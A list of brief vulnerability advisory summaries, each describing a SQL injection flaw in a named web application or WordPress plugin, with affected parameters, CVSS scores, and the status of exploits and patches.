SQL injection in itsourcecode Courier Management System 1.0 allows low-privileged authenticated remote attackers to manipulate backend database queries via the unsanitized 's' parameter in /parcel_list.php. A proof-of-concept exploit is publicly available on GitHub, meaningfully lowering the barrier to exploitation despite the low CVSS 4.0 score of 2.1. No vendor patch has been identified at time of analysis, leaving deployments reliant on compensating controls.

SQL injection in itsourcecode Courier Management System 1.0 lets remote attackers manipulate the 'ID' parameter of /manage_user.php to inject arbitrary SQL into backend database queries. Per the CVSS vector (PR:N) no authentication is required, and publicly available exploit code exists, though the flaw is not listed in CISA KEV and carries only low (C:L/I:L/A:L) per-impact ratings.

SQL injection in code-projects Project Management System 1.0 allows remote unauthenticated attackers to manipulate database queries through the login handler (chk.php). The flaw stems from unsanitized input being passed into a SQL statement, enabling authentication-context query tampering and data disclosure. Publicly available exploit code exists, though the vulnerability is not listed in CISA KEV and no active exploitation is confirmed.

SQL injection in Online Art Gallery Shop 1.0 allows unauthenticated remote attackers to manipulate database queries through the social_linked parameter in /admin/adminHome.php. The vulnerability has publicly available exploit code and a CVSS score of 7.3, indicating high severity with the ability to impact confidentiality, integrity, and availability of the application.

SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 enables remote unauthenticated attackers to manipulate database queries through the ID parameter in /admin/patients/manage_history.php. Public exploit code exists (GitHub), though not listed in CISA KEV. The vulnerability carries moderate risk with CVSS 7.3 reflecting potential for data theft and manipulation of patient records.

SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 allows remote attackers to compromise patient data without authentication via manipulated ID parameter in /classes/Master.php?f=save_patient_history. The vulnerability has publicly available exploit code (GitHub) and enables unauthorized database access with potential to read, modify, or delete patient records. CVSS 7.3 indicates moderate severity with no exploitation prerequisites.

SQL injection in SourceCodester Hospitals Patient Records Management System 1.0 allows authenticated attackers to extract, modify, or delete database records via the ID parameter in /admin/patients/view_history.php. The vulnerability requires low-privilege authenticated access (PR:L) but has low attack complexity (AC:L) and can be exploited remotely. Publicly available exploit code exists on GitHub (referenced in VulDB entry), enabling immediate weaponization by threat actors. EPSS data not available, and the vulnerability is not currently listed in CISA KEV, indicating exploitation may be limited or targeted rather than widespread. The CVSS 6.3 (Medium) rating reflects partial impact across confidentiality, integrity, and availability (C:L/I:L/A:L).

SQL injection in QuantumNous new-api versions up to 0.12.1 allows authenticated remote attackers to manipulate database queries through the SearchUserTopUps and SearchAllTopUps functions in the self endpoint. The vulnerability exists in model/topup.go with confirmed public exploit code available on GitHub. With EPSS data unavailable and CVSS 6.3 (medium severity), the primary risk stems from the low-complexity exploitation requiring only low-level authentication, enabling attackers to exfiltrate sensitive data, modify records, or potentially execute denial-of-service attacks against the database layer.

Authenticated SQL injection in Best Practical's Request Tracker (RT) ticketing system affects versions 5.0.0-5.0.9 and 6.0.0-6.0.2 via the entry_aggregator parameter in the JSON search endpoint, allowing any logged-in RT user to read or modify arbitrary data in the underlying database. The flaw was disclosed alongside the rt-5.0.10/6.0.3 release on 2026-05-20 and carries CVSS 8.8 due to high impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis, and the vulnerability is not listed in CISA KEV.

Unauthenticated SQL injection in YesWiki's Bazar form-import path allows any remote visitor to inject arbitrary SQL into an INSERT statement and exfiltrate the entire database, including yeswiki_users.password hashes. Affects YesWiki 4.6.1, 4.6.2, and the doryphore-dev branch prior to 4.6.4. Publicly available exploit code exists (a working Python PoC is published in the GHSA advisory), though no public exploit identified in CISA KEV at time of analysis.

SQL injection in STER (Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy) versions prior to 9.5 allows authenticated attackers to extract sensitive data by injecting crafted input into multiple Search Filter parameters. The CVSS 4.0 score of 8.7 reflects high confidentiality and integrity impact over the network with low attacker privileges required, and a vendor patch is available in version 9.5. There is no public exploit identified at time of analysis and the CVE is not listed in CISA KEV.

Unauthenticated SQL injection in the WP ERP Pro WordPress plugin (versions through 1.5.1) allows remote attackers to extract sensitive database contents by manipulating the 'search_key' parameter. The flaw stems from missing input escaping and unprepared SQL statements, enabling UNION-based or appended query attacks against any WordPress site running the affected plugin. No public exploit identified at time of analysis, and the issue is not currently listed in CISA KEV.

SQL injection in Open ISES Tickets before 3.44.2 lets authenticated users tamper with backend database queries through the ajax/statistics.php endpoint by injecting payloads into the tick_id and f_tick_id POST parameters. The CVSS 4.0 score of 7.1 reflects high confidentiality impact with lower integrity impact, and while no public exploit is identified at time of analysis, this flaw is one of 19 SQL injection issues bundled into a single critical security release that the vendor urges all users to install immediately.

SQL injection in Open ISES Tickets before 3.44.2 lets authenticated users tamper with the incidents summary report query via the tick_id POST parameter in ajax/reports.php, enabling arbitrary read, modification, or destruction of database contents. The v3.44.2 release notes confirm the fix was part of a broader security overhaul addressing 19 SQL injection flaws and 69 XSS issues. No public exploit identified at time of analysis, and SSVC classifies exploitation status as 'none' with partial technical impact.

SQL injection in Open ISES Tickets before 3.44.2 allows authenticated attackers to manipulate database queries via the unsanitized `id` GET parameter in `ajax/mobile_main.php`. The flaw permits arbitrary read, modification, or destruction of database contents, and is part of a broader batch of 19 SQL injection fixes shipped in v3.44.2. No public exploit identified at time of analysis, but the vendor explicitly classifies v3.44.2 as a 'Critical Security Update' urging immediate upgrade.

SQL injection in Open ISES Tickets before 3.44.2 allows authenticated attackers to manipulate backend database queries via the message.php endpoint, enabling unauthorized read, modification, or destruction of database contents. The flaw stems from unsanitized concatenation of the frm_ticket_id and frm_resp_id POST parameters into SELECT and UPDATE statements. No public exploit identified at time of analysis, though VulnCheck has published a dedicated advisory and the vendor's 3.44.2 release bundles fixes for 19 SQL injection issues across the codebase.

SQL injection in Open ISES Tickets before 3.44.2 allows authenticated attackers to manipulate database queries via unsanitized POST parameters (ticketsdb, ticketshost, ticketsuser, ticketspassword) in db_loader.php, enabling read, modification, or destruction of database contents. The vendor confirms this is one of 19 SQL injection flaws patched in v3.44.2, reported by VulnCheck. No public exploit identified at time of analysis, and the vulnerability requires low-privilege authentication (PR:L per CVSS 4.0 vector).

SQL injection in Open ISES Tickets before 3.44.2 allows attackers controlling or impersonating an InstaMapper or Google Latitude GPS tracking endpoint to inject malicious SQL via unsanitized latitude, longitude, callsign, mph, altitude, and timestamp values parsed by incs/remotes.inc.php. The CVSS 4.0 base score of 8.8 reflects unauthenticated network exploitation with high confidentiality impact, and no public exploit is identified at time of analysis. The flaw was disclosed by VulnCheck and is one of 19 SQL injection issues patched in the v3.44.2 release.

SQL injection in Open ISES Tickets versions prior to 3.44.2 allows authenticated attackers to manipulate ORDER BY clauses via the sort and dir GET parameters in portal/ajax/list_requests.php, enabling unauthorized read, modification, or destruction of database contents. The CVSS 4.0 score of 7.1 reflects network-reachable exploitation with low privileges and no user interaction required. No public exploit identified at time of analysis, but the vendor's own release notes describe this as part of a critical security update patching 19 SQL injection flaws across 11 files.

SQL injection in Open ISES Tickets prior to 3.44.2 allows authenticated attackers to manipulate database queries via the unsanitized 'offset' GET parameter in ajax/sit_incidents.php, which is concatenated directly into a LIMIT clause. Successful exploitation enables reading, modifying, or destroying database contents. No public exploit identified at time of analysis, though the underlying flaw is one of 19 SQL injection issues patched in the same release, indicating broad code-level weakness.

SQL injection in Open ISES Tickets versions prior to 3.44.2 allows authenticated attackers to manipulate database queries through the unsanitized offset parameter in ajax/fullsit_incidents.php. The flaw enables reading, modifying, or destroying database contents and is part of a broader v3.44.2 security release that patched 19 SQL injection issues. No public exploit identified at time of analysis, but the vendor classifies the update as critical and urges immediate upgrade.

SQL injection in Open ISES Tickets prior to 3.44.2 lets authenticated users tamper with database contents by abusing unsanitized POST parameters (tablename, indexname, sortby) in tables.php that are concatenated directly into SELECT, UPDATE, and DELETE identifier positions. The flaw is one of 19 SQLi issues fixed in the v3.44.2 release; no public exploit identified at time of analysis, but the vendor labels the release a Critical Security Update and urges immediate upgrade.

Blind SQL injection in the WP Directory Kit WordPress plugin (versions up to and including 1.5.0) allows remote unauthenticated attackers to inject SQL commands through improperly neutralized input. With a CVSS 9.3 (scope-changed) rating from Patchstack, successful exploitation can expose sensitive database contents and partially impact availability across the WordPress installation. No public exploit identified at time of analysis and the plugin is not currently listed in CISA KEV.

SQL injection in Netatalk 3.1.0 through 4.4.2 allows authenticated remote attackers to compromise the MySQL-backed CNID (Catalog Node ID) database used to track AppleTalk/AFP file metadata. The high CVSS 8.8 score (CVSS:3.1/AV:N/AC:L/PR:L/UI:N) reflects network-reachable exploitation with low privileges and high impact to confidentiality, integrity, and availability; no public exploit identified at time of analysis.

SQL injection in Drupal Core across six major version branches (8.9.0 through 11.3.x) enables remote unauthenticated attackers to manipulate database queries with no required privileges or user interaction, as confirmed by CVSS vector AV:N/AC:L/PR:N/UI:N. The vulnerability yields partial confidentiality and integrity impact per CVSS - enabling data enumeration and limited data manipulation - but does not grant full database control or server compromise. No active exploitation is confirmed (not listed in CISA KEV; SSVC exploitation status: none), but SSVC flags this as automatable, making opportunistic mass scanning against the large global Drupal install base a credible near-term risk.

Blind SQL injection in YITH WooCommerce Product Add-Ons (WordPress plugin) through version 4.29.0 allows high-privileged authenticated users to inject malicious SQL into database queries, leading to confidentiality compromise and limited availability impact across a changed security scope. The flaw was disclosed by Patchstack and carries a CVSS 3.1 score of 7.6; no public exploit identified at time of analysis and the issue is not listed in CISA KEV.

{id} REST endpoint. The flaw stems from a sanitization bypass in the wp-query-builder component where payloads containing a dot character skip $wpdb->prepare() escaping entirely, enabling UNION-based data exfiltration. No public exploit identified at time of analysis, though Tenable Research has published technical details (TRA-2026-43).

Authenticated SQL injection in NextGEN Gallery (WordPress plugin by Awesome Motive/Imagely) before version 4.2.1 allows attackers holding the 'NextGEN Gallery overview' capability - granted to Administrators by default - to inject arbitrary SQL via the 'orderby' parameter on the '/imagely/v1/galleries' and '/imagely/v1/albums' REST endpoints. CVSS 4.0 rates this 9.3 due to high confidentiality, integrity, and scope impact; no public exploit identified at time of analysis, but the issue was reported by Tenable Research (TRA-2026-42) and a vendor patch is available.